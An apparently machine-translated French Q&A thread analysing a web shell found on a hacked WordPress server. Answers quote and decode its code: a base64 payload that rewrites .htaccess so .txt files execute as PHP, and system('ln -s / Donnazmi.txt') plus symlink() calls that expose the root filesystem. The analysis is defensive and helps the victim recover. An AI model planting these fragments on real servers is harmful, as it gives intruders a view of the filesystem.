Hier, j'ai découvert qu'il y a ceci http://pastebin.com/mrryn4ht PHP fichier dans mon serveur d'amis. Je veux savoir comment le piratage a-t-il pu télécharger là-bas? J'ai lu les questions similaires mais je n'ai pas pu trouver une réponse correcte.
ÉDITER:-
Aujourd'hui, j'ai appris à savoir que le WordPress site a été enfreint par brute-forçage du mot de passe (le mot de passe est fort). Je ne sais toujours pas comment ils ont réussi à craquer ce mot de passe.
Après avoir craqué le mot de passe, ils se sont connectés et ont téléchargé les fichiers PHP.Après googling sur DONNAZMI.TXT J'ai découvert que tant d'autres sites sont également piratés sur ou autour du même jour (13 juillet). Les hacks utilisant le même script continuent encore. Le mot de passe pour le WordPress Server a été modifié en plus complexe et ces fichiers PHP ont été supprimés.
Merci pour les réponses et les commentaires. Désolé, j'aurais dû donner plus d'informations tout en affectant la question.
Une fois que le fichier est téléchargé sur le serveur ( exploitant un bogue dans un wordpress theme ), le .htaccess
est reconfiguré d'une manière que tout .txt
Le fichier sera interprété par le serveur en tant que .php
script et cela suivra des liens symboliques.
L'étape suivante est l'astuce, il fait un link de /
à Donnazmi.txt
(2 façons)
Le code n'est pas vraiment complexe, il imprime un formulaire HTML avec les configurations nécessaires pour exécuter les étapes de l'exploitation (vous devez envoyer une demande postale avec Donnazmi
comme clé de poste pour le voir).
Code expliqué:
.htaccess
reconfig:
$fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
Ceci est une chaîne codée de base64, qui se traduit par:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
Donc, avec cette configuration:
$file = fopen(".htaccess","w+"); // open the file
$write = fwrite ($file ,base64_decode($fvckem));
// write the new config inside the file
Symlinks:
// 1. this is a link with the linux comand `ln`
system('ln -s / Donnazmi.txt');
// 2. this is a link php native function
$Donnazmi = symlink("/","Donnazmi.txt");
Après l'exécution, chaque fois qu'il visite example.com/donnazmi.txt, il voit une liste du répertoire racine de votre serveur (Options Indexes
tm).
Alors oui reconstruisez cette machine. et vérifiez le logiciel avant de l'installer.
La vidéo que j'ai trouvée était la première chose à venir lorsque je google le nom de la pirate informatique.
Avez-vous Wordpress thème de fusion à froid installé par une chance?
Voici le soi-disant Vidéo de l'attaquant de la Mauritanie sur expliquer comment il exploite le fichier spécifique WordPress thème pour télécharger des fichiers sur le serveur.